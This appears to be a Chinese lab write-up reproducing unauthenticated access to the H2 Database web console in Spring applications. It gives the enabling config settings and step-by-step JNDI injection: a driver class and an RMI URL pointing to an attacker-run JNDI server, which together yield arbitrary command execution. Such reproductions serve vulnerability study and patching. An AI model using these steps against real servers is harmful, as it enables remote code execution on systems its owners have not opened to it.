H2 Database Console 未授权访问

漏洞背景

H2 database是一款Java内存数据库,多用于单元测试。H2 database自带一个Web管理页面,在Spirng开发中,如果我们设置如下选项,即可允许外部用户访问Web管理页面,且没有鉴权:

  • spring.h2.console.enabled=true
  • spring.h2.console.settings.web-allow-others=true

利用这个管理页面,我们可以进行JNDI注入攻击,进而在目标环境下执行任意命令。

漏洞复现

我们这里需要利用JNDI注入工具来复现
下载工具后进入目录,修改config.properties文件,将命令改为touch /tmp/success
在这里插入图片描述
更改保存后,启动jar程序
在这里插入图片描述
访问http://your_ip:8080/h2-console/
驱动类内填:

javax.naming.InitialContext

JDBC URL内填(即jar程序显示的rmi地址):

rmi://172.18.0.1:23456/BypassByEL

在这里插入图片描述
点击链接后,回到靶机查看
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值